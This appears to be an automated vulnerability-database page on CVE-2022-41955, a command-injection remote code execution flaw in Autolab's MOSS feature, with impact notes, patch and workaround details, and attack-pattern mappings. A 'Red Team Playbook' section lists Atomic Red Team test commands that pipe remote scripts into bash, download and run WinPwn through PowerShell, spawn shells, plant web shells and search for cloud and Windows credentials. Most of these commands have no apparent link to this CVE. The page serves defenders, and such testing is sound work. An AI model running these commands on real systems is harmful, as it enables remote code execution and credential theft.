CVE-2022-41955
Overview
The vulnerability in Autolab is a remote code execution flaw rooted in improper handling of command execution within the MOSS (Measure of Software Similarity) feature. Specifically, the issue arises from insufficient validation or sanitization of inputs passed to system-level commands invoked by the run_moss function in the courses_controller.rb component. This allows an authenticated instructor with access to MOSS functionality to inject and execute arbitrary commands on the server hosting Autolab.
Vulnerability Description
Autolab is a course management service, initially developed by a team of students at Carnegie Mellon University, that enables instructors to offer autograded programming assignments to their students over the Web. A remote code execution vulnerability was discovered in Autolab's MOSS functionality, whereby an instructor with access to the feature might be able to execute code on the server hosting Autolab. This vulnerability has been patched in version 2.10.0. As a workaround, disable the MOSS feature if it is unneeded by replacing the body of `run_moss` in `app/controllers/courses_controller.rb` with `render(plain: "Feature disabled", status: :bad_request) && return`.
Impact
An attacker with instructor-level access to the MOSS feature can execute arbitrary code on the Autolab server, enabling full compromise of the host system. This includes the ability to manipulate data, escalate privileges, or disrupt service availability. The vulnerability requires network access and valid instructor authentication (PR:L), but no user interaction beyond feature access. The CVSS vector (AV:N/AC:L/PR:L/UI:N) indicates remote network exploitation with low attack complexity and no user interaction, resulting in high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Remediation requires upgrading Autolab to version 2.10.0 or later, where the vulnerability in the run_moss function has been patched. As an immediate workaround, disable the MOSS feature by replacing the body of run_moss in app/controllers/courses_controller.rb with the code: render(plain: "Feature disabled", status: :bad_request) && return. Detailed patch and mitigation instructions are available in the Autolab GitHub security advisory GHSA-x5r3-vf3p-3269 and the securitylab.github.com advisory GHSL-2022-100_Autolab.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Autolab's MOSS functionality represents a significant security risk due to its potential for remote code execution. This flaw arises from improper handling of user input, allowing an instructor with access to the MOSS feature to execute arbitrary code on the server. The MOSS (Measure of Software Similarity) tool, designed to detect similarities in programming assignments, inadvertently exposes the server to malicious commands. When instructors utilize this feature, they may unknowingly introduce unsafe code that can be executed in the server environment, leading to unauthorized access and control over the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could exploit the MOSS functionality by crafting a specially designed input that the server processes without adequate validation. For instance, if an instructor is tricked into submitting a payload that contains malicious code, the server may execute this code with the same privileges as the application, potentially leading to a complete compromise of the server. Scenarios may include an attacker gaining access to sensitive data, altering course materials, or even disrupting the entire Autolab service, which could affect numerous students and instructors relying on the platform for their educational needs.
The real-world impact of this vulnerability is profound, particularly in an educational context where Autolab is widely used. A successful exploitation could lead to unauthorized access to student data, including personal information and academic records. Furthermore, the integrity of the educational process could be compromised, as attackers might manipulate grades or access proprietary course materials. The business risk extends beyond immediate data loss; it includes reputational damage, loss of trust from users, and potential legal ramifications stemming from data breaches. Institutions utilizing Autolab must consider the implications of such vulnerabilities, as they can significantly undermine the educational environment and operational integrity.
To detect and mitigate this vulnerability, organizations should prioritize updating to the patched version of Autolab, specifically version 2.10.0, which addresses this security flaw. Regularly monitoring and auditing application logs can help identify any unusual activity that may indicate exploitation attempts. Additionally, implementing strict access controls and ensuring that only trusted personnel have access to the MOSS feature can reduce the risk of exploitation. As a temporary workaround, disabling the MOSS feature entirely can be a prudent measure until the patch is applied. Organizations should also conduct security training for instructors to raise awareness about the risks associated with executing code on shared platforms and the importance of validating inputs.
In conclusion, the remote code execution vulnerability in Autolab's MOSS functionality underscores the critical need for robust security practices in educational technology. As institutions increasingly rely on digital platforms for course management, understanding and addressing such vulnerabilities is essential to safeguarding both academic integrity and sensitive data. By implementing proactive detection and mitigation strategies, educational institutions can better protect themselves against the evolving landscape of cybersecurity threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Autolabproject | Autolab | All |
cpe:2.3:a:autolabproject:autolab:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
49%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High | |
| CAPEC-6 | Argument Injection |
45%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-41955 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/autolab/Autolab/security/advisories/GHSA-x5r3-vf3p-3269 |
| securitylab.github.com |
GitHub CVE
x_refsource_MISC
|
https://securitylab.github.com/advisories/GHSL-2022-100_Autolab/ |